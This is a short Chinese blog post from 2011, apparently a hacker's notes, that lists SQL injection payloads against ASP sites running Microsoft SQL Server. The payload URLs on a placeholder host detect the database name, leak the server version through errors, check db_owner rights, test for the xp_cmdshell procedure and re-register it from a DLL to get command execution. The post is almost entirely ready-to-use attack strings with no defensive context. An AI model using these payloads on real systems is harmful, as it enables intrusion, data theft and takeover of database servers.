| | | | |

|

注入语句

库名检测:

http://www.xxx.com/asp?=xx' and user>0--　　　　//“--”是注视,判断库名.

SQL系统版本检测:

http://www.xxx.com/asp?=xx' and 1=(select @@VERSION)--　//Microsoft SQL Server版本　

http://www.xxx.com/asp?=xx' and 1=convert(int,@@version)--　　//Microsoft SQL Server版本

数据库权限判断:

http://www.xxx.com/asp?=xx and 1=(Select IS_MEMBER('db_owner'))

http://www.xxx.com/asp?=xx and char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

判断xp_cmdshell扩展存储过程是否存在:

http://www.xxx.com/asp?=xx and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')

恢复xp_cmdshell扩展存储的命令：

http://www.xxx.com/asp?=xx ;exec master.dbo.sp_addextendedproc 'xp_cmdshell','X:\inetput\web\xplog70.dll';--　　　　//"x"盘符

发表于 2011-12-01 17:49 h4ck7ao 阅读(111) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

公告